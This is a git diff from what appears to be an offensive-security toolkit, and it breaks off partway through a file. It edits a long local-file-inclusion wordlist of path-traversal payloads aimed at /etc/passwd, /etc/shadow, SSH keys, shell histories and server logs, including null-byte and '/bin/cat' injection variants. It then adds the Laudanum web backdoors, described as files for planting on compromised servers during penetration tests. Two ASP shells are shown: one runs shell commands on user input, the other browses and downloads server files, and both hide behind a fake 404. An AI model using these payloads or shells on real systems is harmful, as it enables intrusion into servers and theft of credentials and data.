+../../../../../../../var/log/access.log +../../../../../var/log/access_log /var/log/acct +/var/log/apache2/access_log +/var/log/apache2/access.log +../../../../../../../var/log/apache2/access_log +../../../../../../../var/log/apache2/access.log +/var/log/apache2/error_log +/var/log/apache2/error.log +../../../../../../../var/log/apache2/error_log +../../../../../../../var/log/apache2/error.log +/var/log/apache/access_log +/var/log/apache/access.log +../../../../../../../var/log/apache/access_log +../../../../../../../var/log/apache/access.log +../../../../../var/log/apache/access_log +../../../../../var/log/apache/access.log +/var/log/apache/error_log +/var/log/apache/error.log +../../../../../../../var/log/apache/error_log +../../../../../../../var/log/apache/error.log +../../../../../var/log/apache/error_log +../../../../../var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log -/var/log/apache/access.log -/var/log/apache/access_log -/var/log/apache/error.log -/var/log/apache/error_log -/var/log/apache2/access.log -/var/log/apache2/access_log -/var/log/apache2/error.log -/var/log/apache2/error_log /var/log/auth -/var/log/auth.log /var/log/authlog +/var/log/auth.log /var/log/boot.log /var/log/cron.log -/var/log/error.log +/var/log/dmesg /var/log/error_log -/var/log/exim/mainlog -/var/log/exim/paniclog -/var/log/exim/rejectlog +/var/log/error.log +../../../../../../../var/log/error_log +../../../../../../../var/log/error.log +../../../../../var/log/error_log /var/log/exim_mainlog +/var/log/exim/mainlog /var/log/exim_paniclog +/var/log/exim/paniclog /var/log/exim_rejectlog +/var/log/exim/rejectlog +/var/log/ftplog /var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log -/var/log/ftplog /var/log/httpd/ -/var/log/httpd/access.log /var/log/httpd/access_log -/var/log/httpd/error.log +/var/log/httpd/access.log +../../../../../var/log/httpd/access_log /var/log/httpd/error_log +/var/log/httpd/error.log +../../../../../var/log/httpd/error_log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/kern.log @@ -363,12 +649,12 @@ /var/log/maillog /var/log/message /var/log/messages +/var/log/mysqlderror.log +/var/log/mysqld.log /var/log/mysql.log /var/log/mysql/mysql-bin.log -/var/log/mysql/mysql-slow.log /var/log/mysql/mysql.log -/var/log/mysqld.log -/var/log/mysqlderror.log +/var/log/mysql/mysql-slow.log /var/log/ncftpd.errs /var/log/ncftpd/misclog.txt /var/log/news @@ -381,12 +667,13 @@ /var/log/news/suck.err /var/log/news/suck.notice /var/log/poplog +/var/log/POPlog /var/log/proftpd /var/log/proftpd.access_log /var/log/proftpd.xferlog /var/log/proftpd/xferlog.legacy -/var/log/pure-ftpd/pure-ftpd.log /var/log/pureftpd.log +/var/log/pure-ftpd/pure-ftpd.log /var/log/qmail /var/log/qmail/ /var/log/samba @@ -406,6 +693,8 @@ /var/lp/logs/lpsched /var/lp/logs/requests /var/mysql.log +/var/run/httpd.pid +/var/run/mysqld/mysqld.pid /var/run/utmp /var/saf/_log /var/saf/port/log @@ -418,296 +707,36 @@ /var/www/localhost/htdocs/.htaccess /var/www/log/access_log /var/www/log/error_log -/var/www/logs/access.log +/../../var/www/logs/access_log /var/www/logs/access_log -/var/www/logs/error.log +/var/www/logs/access.log +../../../../../../../var/www/logs/access_log +../../../../../../../var/www/logs/access.log +../../../../../var/www/logs/access.log /var/www/logs/error_log +/var/www/logs/error.log +../../../../../../../var/www/logs/error_log +../../../../../../../var/www/logs/error.log +../../../../../var/www/logs/error_log +../../../../../var/www/logs/error.log /var/www/sitename/htdocs/ /var/www/vhosts/sitename/httpdocs/.htaccess /var/www/web1/html/.htaccess +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default /web/conf/php.ini +/WINDOWS\php.ini +../../windows/win.ini +/WINNT\php.ini +/..\..\..\..\..\..\winnt\win.ini /www/logs/proftpd.system.log /xampp\apache\bin\php.ini -C:/boot.ini -C:/inetpub/wwwroot/global.asa -C:\boot.ini -C:\inetpub\wwwroot\global.asa -\..\..\..\..\..\..\..\..\..\..\boot.ini -\..\..\..\..\..\..\..\..\..\..\etc\passwd -\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -\..\..\..\..\..\..\..\..\..\..\etc\shadow -\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -\\'/bin/cat%20/etc/passwd\\' -\\'/bin/cat%20/etc/shadow\\' -c:\Program Files\Apache Group\Apache\logs\access.log -c:\Program Files\Apache Group\Apache\logs\error.log -c:\System32\Inetsrv\metabase.xml -c:\apache\logs\access.log -c:\apache\logs\error.log -c:\inetpub\wwwroot\index.asp -d:\System32\Inetsrv\metabase.xml -/var/log/mysqld.log -/etc/passwd -/etc/shadow -/etc/hosts -/etc/hosts.allow -/etc/hosts.equiv -/etc/hosts.deny -/etc/ssh/sshd_config -/etc/apache/httpd.conf -/etc/resolv.conf -/var/log/message -/etc/inetd.conf -/etc/crontab -/etc/defaultdomain -/etc/rpc -/.rhosts -/.shosts -/.ssh/authorized_keys -/.bash_history -/.bash_profile -/.sh_history -/.profile -/.bashrc -/.logout -/.Xauthority -/.netrc -/.cshrc -/etc/hostname.hme0 -/etc/hostname.pcn0 -/etc/hostname.iprb0 -/etc/hostname.qfe0 -/etc/hostname.eri0 -/etc/hostname.bge -/etc/hostname.ce0 -/etc/hostname.dmfe0 -/etc/hostname.dnet0 -/etc/hostname.elx0 -/etc/hostname.elxl0 -/etc/hostname.spwr0 -/etc/hostname.eri0 -/etc/hostname.ge0 -/etc/hostname.ieef0 -/etc/hostname.le0 -/etc/hostname.dcelx0 -/etc/hostname.ecn0 -/etc/hostname.lo -/etc/hostname.hme1 -/etc/hostname.pcn1 -/etc/hostname.iprb1 -/etc/hostname.qfe1 -/etc/hostname.eri1 -/etc/hostname.bge -/etc/hostname.ce1 -/etc/hostname.dmfe1 -/etc/hostname.dnet1 -/etc/hostname.elx1 -/etc/hostname.elxl1 -/etc/hostname.spwr1 -/etc/hostname.eri1 -/etc/hostname.ge1 -/etc/hostname.ieef1 -/etc/hostname.le1 -/etc/hostname.dcelx1 -/etc/hostname.ecn1 -/etc/hostname.lo -/etc/hostname.hme2 -/etc/hostname.pcn2 -/etc/hostname.iprb2 -/etc/hostname.qfe2 -/etc/hostname.eri2 -/etc/hostname.bge -/etc/hostname.ce2 -/etc/hostname.dmfe2 -/etc/hostname.dnet2 -/etc/hostname.elx2 -/etc/hostname.elxl2 -/etc/hostname.spwr2 -/etc/hostname.eri2 -/etc/hostname.ge2 -/etc/hostname.ieef2 -/etc/hostname.le2 -/etc/hostname.dcelx2 -/etc/hostname.ecn2 -/etc/hostname.lo -/etc/hostname.hme3 -/etc/hostname.pcn3 -/etc/hostname.iprb3 -/etc/hostname.qfe3 -/etc/hostname.eri3 -/etc/hostname.bge -/etc/hostname.ce3 -/etc/hostname.dmfe3 -/etc/hostname.dnet3 -/etc/hostname.elx3 -/etc/hostname.elxl3 -/etc/hostname.spwr3 -/etc/hostname.eri3 -/etc/hostname.ge3 -/etc/hostname.ieef3 -/etc/hostname.le3 -/etc/hostname.dcelx3 -/etc/hostname.ecn3 -/etc/hostname.lo -/etc/default/passwd -/etc/syslog.conf -/etc/syslogd.conf -/etc/release -/etc/motd -/etc/issue -/etc/group -/etc/nsswitch.conf -/etc/opt/ipf/ipf.conf -/etc/opt/ipf/ipnat.conf -/etc/vfstab -/etc/system -/etc/defaultrouter -/var/adm/messages -/var/log/syslog -/var/adm/utmpx -/var/adm/loginlog -/var/adm/lastlog -/etc/netconfig -/var/log/authlog -/log/miscDir/accesslog -/etc/sudoers -/etc/httpd/conf/httpd.conf -/etc/make.conf -/etc/apt/sources.list -/etc/passwd -/etc/shadow -/etc/hosts -/etc/hosts.allow -/etc/hosts.equiv -/etc/hosts.deny -/etc/ssh/sshd_config -/etc/apache/httpd.conf -/etc/resolv.conf -/var/log/messages -/var/log/dmesg -/etc/inetd.conf -/etc/crontab -/etc/defaultdomain -/etc/rpc -/.rhosts -/.shosts -/.ssh/authorized_keys -/.bash_history -/.bash_profile -/.sh_history -/.profile -/.bashrc -/.logout -/.Xauthority -/.netrc -/.forward -/.cshrc -/etc/default/passwd -/etc/syslog.conf -/etc/syslogd.conf -/etc/release -/etc/issue -/etc/motd -/etc/group -/etc/fstab -/etc/nsswitch.conf -/etc/vfstab -/etc/system -/var/log/syslog -/etc/netconfig -/var/log/authlog -/log/miscDir/accesslog -/etc/sudoers -/etc/updatedb.conf -/etc/httpd/conf.d/ssl.conf -/etc/httpd/conf.d/php.conf -/etc/httpd/conf.d/squirrelmail.conf -/var/log/httpd/error_log -/var/log/httpd/access_log -/var/log/apache/error_log -/var/log/apache/access_log -/var/log/apache2/error_log -/var/log/apache2/access_log -/etc/logrotate.d/httpd -/var/run/httpd.pid -/proc/cpuinfo -/proc/version -/etc/php.ini -/etc/php.d/dom.ini -/etc/php.d/gd.ini -/etc/php.d/imap.ini -/etc/php.d/json.ini -/etc/php.d/ldap.ini -/etc/php.d/mbstring.ini -/etc/php.d/mysql.ini -/etc/php.d/mysqli.ini -/etc/php.d/odbc.ini -/etc/php.d/pdo.ini -/etc/php.d/pdo_mysql.ini -/etc/php.d/pdo_odbc.ini -/etc/php.d/pdo_pgsql.ini -/etc/php.d/pdo_sqlite.ini -/etc/php.d/pgsql.ini -/etc/php.d/xmlreader.ini -/etc/php.d/xmlwriter.ini -/etc/php.d/xsl.ini -/etc/php.d/zip.ini -/etc/my.cnf -/var/run/mysqld/mysqld.pid -/var/log/mysqld.log -/var/log/httpd/access.log -/var/log/httpd/error.log -/var/log/httpd/access_log -/var/log/httpd/error_log -/apache/logs/error_log -/apache/logs/access_log -/apache/logs/error.log -/apache/logs/access.log -/logs/error_log -/logs/access_log -/logs/error.log -/logs/access.log -/etc/httpd/logs/access_log -/etc/httpd/logs/access.log -/etc/httpd/logs/error_log -/etc/httpd/logs/error.log -/usr/local/apache/logs/access_log -/usr/local/apache/logs/access.log -/usr/local/apache/logs/error_log -/usr/local/apache/logs/error.log -/var/log/apache/access_log -/var/log/apache/access.log -/var/log/apache/error_log -/var/log/apache/error.log -/var/www/logs/access_log -/var/www/logs/access.log -/var/www/logs/error_log -/var/www/logs/error.log -/var/log/access_log -/var/log/error_log -/var/log/access.log -/var/log/error.log -/usr/local/apache2/logs/access_log -/usr/local/apache2/logs/access.log -/usr/local/apache2/logs/error_log -/usr/local/apache2/logs/error.log -/var/log/apache2/access_log -/var/log/apache2/access.log -/var/log/apache2/error_log -/var/log/apache2/error.log -/apache2/logs/error_log -/apache2/logs/access_log -/apache2/logs/error.log -/apache2/logs/access.log -/var/lib/mlocate/mlocate.db -/proc/meminfo -/proc/net/route -/proc/net/tcp -/proc/net/arp -/proc/net/dev -/proc/partitions -/proc/mounts -/proc/loadavg -/boot/grub/grub.conf -/etc/mailman/mm_cfg.py -/etc/postfix/mydomains \ No newline at end of file +/.Xauthority \ No newline at end of file diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS new file mode 100644 index 0000000..69b9a81 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS @@ -0,0 +1,17 @@ +The Team +======================================================== +- Kevin Johnson + - Project Lead + +- Justin Searle + - Core Developer + +- Tim Medin + - Core Developer + +- James Jardine + - Core Developer + +Additional Coding +======================================================== +- Robin Wood diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL new file mode 100644 index 0000000..8155770 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL @@ -0,0 +1,258 @@ +The GNU General Public License (GPL) +Version 2, June 1991 + +Copyright (C) 1989, 1991 Free Software Foundation, Inc. +59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + +Everyone is permitted to copy and distribute verbatim copies +of this license document, but changing it is not allowed. + +Preamble + +The licenses for most software are designed to take away your freedom to share +and change it. By contrast, the GNU General Public License is intended to +guarantee your freedom to share and change free software--to make sure the +software is free for all its users. This General Public License applies to most +of the Free Software Foundation's software and to any other program whose +authors commit to using it. (Some other Free Software Foundation software is +covered by the GNU Library General Public License instead.) You can apply it to +your programs, too. + +When we speak of free software, we are referring to freedom, not price. Our +General Public Licenses are designed to make sure that you have the freedom to +distribute copies of free software (and charge for this service if you wish), +that you receive source code or can get it if you want it, that you can change +the software or use pieces of it in new free programs; and that you know you can +do these things. + +To protect your rights, we need to make restrictions that forbid anyone to deny +you these rights or to ask you to surrender the rights. These restrictions +translate to certain responsibilities for you if you distribute copies of the +software, or if you modify it. + +For example, if you distribute copies of such a program, whether gratis or for +a fee, you must give the recipients all the rights that you have. You must make +sure that they, too, receive or can get the source code. And you must show them +these terms so they know their rights. + +We protect your rights with two steps: (1) copyright the software, and (2) +offer you this license which gives you legal permission to copy, distribute +and/or modify the software. + +Also, for each author's protection and ours, we want to make certain that +everyone understands that there is no warranty for this free software. If the +software is modified by someone else and passed on, we want its recipients to +know that what they have is not the original, so that any problems introduced +by others will not reflect on the original authors' reputations. + +Finally, any free program is threatened constantly by software patents. We wish +to avoid the danger that redistributors of a free program will individually +obtain patent licenses, in effect making the program proprietary. To prevent +this, we have made it clear that any patent must be licensed for everyone's free +use or not licensed at all. + +The precise terms and conditions for copying, distribution and modification +follow. + +TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + +0. This License applies to any program or other work which contains a notice +placed by the copyright holder saying it may be distributed under the terms of +this General Public License. The "Program", below, refers to any such program or +work, and a "work based on the Program" means either the Program or any +derivative work under copyright law: that is to say, a work containing the +Program or a portion of it, either verbatim or with modifications and/or +translated into another language. (Hereinafter, translation is included without +limitation in the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not covered by +this License; they are outside its scope. The act of running the Program is not +restricted, and the output from the Program is covered only if its contents +constitute a work based on the Program (independent of having been made by +running the Program). Whether that is true depends on what the Program does. + +1. You may copy and distribute verbatim copies of the Program's source code as +you receive it, in any medium, provided that you conspicuously and appropriately +publish on each copy an appropriate copyright notice and disclaimer of warranty; +keep intact all the notices that refer to this License and to the absence of any +warranty; and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and you may at +your option offer warranty protection in exchange for a fee. + +2. You may modify your copy or copies of the Program or any portion of it, thus +forming a work based on the Program, and copy and distribute such modifications +or work under the terms of Section 1 above, provided that you also meet all of +these conditions: + + a) You must cause the modified files to carry prominent notices stating that + you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in whole or + in part contains or is derived from the Program or any part thereof, to be + licensed as a whole at no charge to all third parties under the terms of + this License. + + c) If the modified program normally reads commands interactively when run, + you must cause it, when started running for such interactive use in the most + ordinary way, to print or display an announcement including an appropriate + copyright notice and a notice that there is no warranty (or else, saying + that you provide a warranty) and that users may redistribute the program + under these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but does not + normally print such an announcement, your work based on the Program is not + required to print an announcement.) + +These requirements apply to the modified work as a whole. If identifiable +sections of that work are not derived from the Program, and can be reasonably +considered independent and separate works in themselves, then this License, and +its terms, do not apply to those sections when you distribute them as separate +works. But when you distribute the same sections as part of a whole which is a +work based on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the entire whole, +and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest your +rights to work written entirely by you; rather, the intent is to exercise the +right to control the distribution of derivative or collective works based on the +Program. + +In addition, mere aggregation of another work not based on the Program with the +Program (or with a work based on the Program) on a volume of a storage or +distribution medium does not bring the other work under the scope of this +License. + +3. You may copy and distribute the Program (or a work based on it, under +Section 2) in object code or executable form under the terms of Sections 1 and 2 +above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable source + code, which must be distributed under the terms of Sections 1 and 2 above on + a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three years, to + give any third party, for a charge no more than your cost of physically + performing source distribution, a complete machine-readable copy of the + corresponding source code, to be distributed under the terms of Sections 1 + and 2 above on a medium customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer to + distribute corresponding source code. (This alternative is allowed only for + noncommercial distribution and only if you received the program in object + code or executable form with such an offer, in accord with Subsection b + above.) + +The source code for a work means the preferred form of the work for making +modifications to it. For an executable work, complete source code means all +the source code for all modules it contains, plus any associated interface +definition files, plus the scripts used to control compilation and installation +of the executable. However, as a special exception, the source code distributed +need not include anything that is normally distributed (in either source or +binary form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component itself +accompanies the executable. + +If distribution of executable or object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the source code +from the same place counts as distribution of the source code, even though third +parties are not compelled to copy the source along with the object code. + +4. You may not copy, modify, sublicense, or distribute the Program except as +expressly provided under this License. Any attempt otherwise to copy, modify, +sublicense or distribute the Program is void, and will automatically terminate +your rights under this License. However, parties who have received copies, or +rights, from you under this License will not have their licenses terminated so +long as such parties remain in full compliance. + +5. You are not required to accept this License, since you have not signed it. +However, nothing else grants you permission to modify or distribute the Program +or its derivative works. These actions are prohibited by law if you do not +accept this License. Therefore, by modifying or distributing the Program (or any +work based on the Program), you indicate your acceptance of this License to do +so, and all its terms and conditions for copying, distributing or modifying the +Program or works based on it. + +6. Each time you redistribute the Program (or any work based on the Program), +the recipient automatically receives a license from the original licensor to +copy, distribute or modify the Program subject to these terms and conditions. +You may not impose any further restrictions on the recipients' exercise of the +rights granted herein. You are not responsible for enforcing compliance by third +parties to this License. + +7. If, as a consequence of a court judgment or allegation of patent infringement +or for any other reason (not limited to patent issues), conditions are imposed +on you (whether by court order, agreement or otherwise) that contradict the +conditions of this License, they do not excuse you from the conditions of this +License. If you cannot distribute so as to satisfy simultaneously your +obligations under this License and any other pertinent obligations, then as a +consequence you may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by all those +who receive copies directly or indirectly through you, then the only way you +could satisfy both it and this License would be to refrain entirely from +distribution of the Program. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply and the +section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any patents or +other property right claims or to contest validity of any such claims; this +section has the sole purpose of protecting the integrity of the free software +distribution system, which is implemented by public license practices. Many +people have made generous contributions to the wide range of software +distributed through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing to +distribute software through any other system and a licensee cannot impose that +choice. + +This section is intended to make thoroughly clear what is believed to be a +consequence of the rest of this License. + +8. If the distribution and/or use of the Program is restricted in certain +countries either by patents or by copyrighted interfaces, the original copyright +holder who places the Program under this License may add an explicit +geographical distribution limitation excluding those countries, so that +distribution is permitted only in or among countries not thus excluded. In such +case, this License incorporates the limitation as if written in the body of +this License. + +9. The Free Software Foundation may publish revised and/or new versions of the +General Public License from time to time. Such new versions will be similar in +spirit to the present version, but may differ in detail to address new problems +or concerns. + +Each version is given a distinguishing version number. If the Program specifies +a version number of this License which applies to it and "any later version", +you have the option of following the terms and conditions either of that version +or of any later version published by the Free Software Foundation. If the +Program does not specify a version number of this License, you may choose any +version ever published by the Free Software Foundation. + +10. If you wish to incorporate parts of the Program into other free programs +whose distribution conditions are different, write to the author to ask +for permission. For software which is copyrighted by the Free Software +Foundation, write to the Free Software Foundation; we sometimes make exceptions +for this. Our decision will be guided by the two goals of preserving the free +status of all derivatives of our free software and of promoting the sharing and +reuse of software generally. + +NO WARRANTY + +11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE +PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED +IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS +IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT +NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + +12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL +ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE +PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, +SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY +TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF +THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER +PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/README b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/README new file mode 100644 index 0000000..2a301ae --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/README @@ -0,0 +1,35 @@ +Laudanum: Injectable Web Exploit Code v0.4 + +By Kevin Johnson + and the Laudanum Development Team + +Project Website: http://laudanum.secureideas.net +Sourceforge Site: http://sourceforge.net/projects/laudanum + +SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum + +------------------------------------------------------------------------------- +** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team +** +** This program is free software; you can redistribute it and/or modify +** it under the terms of the GNU General Public License as published by +** the Free Software Foundation; either version 2 of the License, or +** (at your option) any later version. +** +** This program is distributed in the hope that it will be useful, +** but WITHOUT ANY WARRANTY; without even the implied warranty of +** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +** GNU General Public License for more details. +** +** You should have received a copy of the GNU General Public License +** along with this program; if not, write to the Free Software +** Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. +------------------------------------------------------------------------------- + +I. ABOUT +_____________________________________ +Laudanum is a collection of injectable files, designed to be used in a pentest +when upload vulnerabilities, administrative interfaces, and SQL injection flaws +are found. These files are written in multiple languages for different +environments. They provide functionality such as shell, DNS query, LDAP +retrieval and others. diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp new file mode 100644 index 0000000..317c3ee --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp @@ -0,0 +1,153 @@ +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** This file provides access to DNS on the system. +' *** Written by Tim Medin +' *** +' ******************************************************************************** +' *** This program is free software; you can redistribute it and/or +' *** modify it under the terms of the GNU General Public License +' *** as published by the Free Software Foundation; either version 2 +' *** of the License, or (at your option) any later version. +' *** +' *** This program is distributed in the hope that it will be useful, +' *** but WITHOUT ANY WARRANTY; without even the implied warranty of +' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +' *** GNU General Public License for more details. +' *** +' *** You can get a copy of the GNU General Public License from this +' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +' *** You can also write to the Free Software Foundation, Inc., Temple +' *** Place - Suite Boston, MA USA. +' *** +' ***************************************************************************** */ + +' ***************** Config entries below *********************** + +' IPs are enterable as individual addresses TODO: add CIDR support +Dim allowedIPs +Dim allowed +Dim qtypes +Dim qtype +Dim validtype +Dim query +Dim i +Dim command + +allowedIPs = "192.168.0.1,127.0.0.1" +' Just in cace you added a space in the line above +allowedIPs = replace(allowedIPS," ","") +'turn it into an array +allowedIPs = split(allowedIPS,",") ' + +' make sure the ip is allowed +allowed = 0 +for i = lbound(allowedIPs) to ubound(allowedIPs) + if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then + allowed = 1 + Exit For + end if +next +' send a 404 if not the allowed IP +if allowed = 0 then + Response.Status = "404 File Not Found" + Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) + Response.End +end if + +%> + + + Laudanum ASP DNS Access + + + + + + +

DNS Query 0.1

+<% + +' dns query types as defined as by windows nslookup +qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",") +qtype = UCase(Request.Form("type")) + +' see if the query type is valid, if it isn't then set it. +validtype = 0 +for i = lbound(qtypes) to ubound(qtypes) + if qtype = qtypes(i) then + validtype = 1 + Exit For + end if +next +if validtype = 0 then qtype = "ANY" + +%> +
+
+ DNS Lookup: +

Query: + Type: + +

+
+<% + +' get the query +query = trim(Request.Form("query")) +' the query must be sanitized a bit to try to make sure the shell doesn't hang +query = replace(query, " ", "") +query = replace(query, ";", "") + +if len(query) > 0 then + command = "nslookup -type=" & qtype & " " & query + Set objWShell = Server.CreateObject("WScript.Shell") + Set objCmd = objWShell.Exec(command) + strPResult = objCmd.StdOut.Readall() + set objCmd = nothing: Set objWShell = nothing + %>
<%
+	Response.Write command & "
"
+	Response.Write replace(strPResult,vbCrLf,"
")
+	%>
<% +end if +%> +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp new file mode 100644 index 0000000..cc0faff --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp @@ -0,0 +1,179 @@ +<%@Language="VBScript"%> +<%Option Explicit%> +<%Response.Buffer = True%> +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** This file provides access to the file system. +' *** Written by Tim Medin +' *** +' ******************************************************************************** +' *** This program is free software; you can redistribute it and/or +' *** modify it under the terms of the GNU General Public License +' *** as published by the Free Software Foundation; either version 2 +' *** of the License, or (at your option) any later version. +' *** +' *** This program is distributed in the hope that it will be useful, +' *** but WITHOUT ANY WARRANTY; without even the implied warranty of +' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +' *** GNU General Public License for more details. +' *** +' *** You can get a copy of the GNU General Public License from this +' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +' *** You can also write to the Free Software Foundation, Inc., Temple +' *** Place - Suite Boston, MA USA. +' *** +' ***************************************************************************** */ + +' ***************** Config entries below *********************** + +' Define variables +Dim allowedIPs +Dim allowed +Dim filepath +Dim file +Dim stream +Dim path +Dim i +Dim fso +Dim folder +Dim list +Dim temppath + +' IPs are enterable as individual addresses TODO: add CIDR support +allowedIPs = "192.168.0.1,127.0.0.1,::1" +' Just in cace you added a space in the line above +allowedIPs = replace(allowedIPS," ","") +'turn it into an array +allowedIPs = split(allowedIPS,",") ' +' make sure the ip is allowed +allowed = 0 +for i = lbound(allowedIPs) to ubound(allowedIPs) + if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then + allowed = 1 + exit for + end if +next +' send a 404 if the IP Address is not allowed +if allowed = 0 then + Response.Status = "404 File Not Found" + Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) + Response.End +end if + +' create file object for use everywhere +set fso = CreateObject("Scripting.FileSystemObject") + +' download a file if selected +filepath = trim(Request.QueryString("file")) +'validate file +if len(filepath) > 0 then + if fso.FileExists(filepath) then + 'valid file + + Set file = fso.GetFile(filepath) + Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name + 'Response.AddHeader "Content-Length", file.Size + Response.ContentType = 